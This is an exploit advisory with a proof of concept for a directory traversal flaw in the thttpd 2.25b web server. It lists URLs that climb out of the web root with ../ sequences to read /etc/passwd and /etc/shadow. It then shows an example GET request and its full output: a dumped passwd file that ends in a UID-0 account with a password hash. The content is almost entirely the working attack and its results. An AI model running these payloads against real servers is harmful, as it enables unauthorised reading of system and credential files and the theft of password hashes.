########################################### # # Software Name : Thttpd 2.25b # # Version : 2.25b (29dec2003) # # Bug Type : Directory Traversal Vulnerability # # Found by : Metropolis # # Home : http://metropolis.fr.cr # # Discovered : 19/05/2013 # # Download app : http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz # # ########################################### PoC : 127.0.0.1:80/../../../../../../../../etc/passwd 127.0.0.1:80/../../../../../../../../etc/shadow Example : metropolis@Linuxbox ~ $ GET 127.0.0.1:80/../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/dev/null xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false ntp:x:38:38::/etc/ntp:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/bin/false gdm:x:42:42::/var/gdm:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/bin/false ident:x:98:98:pident user:/:/sbin/nologin radvd:x:75:75:radvd user:/:/bin/false postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash apache:x:48:48:Apache:/var/www:/bin/false squid:x:23:23::/var/spool/squid:/dev/null named:x:70:70:Named:/var/named:/bin/false pcap:x:77:77::/var/arpwatch:/bin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash junkbust:x:73:73::/etc/junkbuster:/bin/bash mailman:x:41:41:GNU Mailing List Manager:/var/mailman:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false pvm:x:24:24::/usr/share/pvm3:/bin/bash user:$1$DjTSjByw$IQj8EmL4l7b0tLWbUTOrX0:0:0:Linux User,,,:/home/user:/bin/sh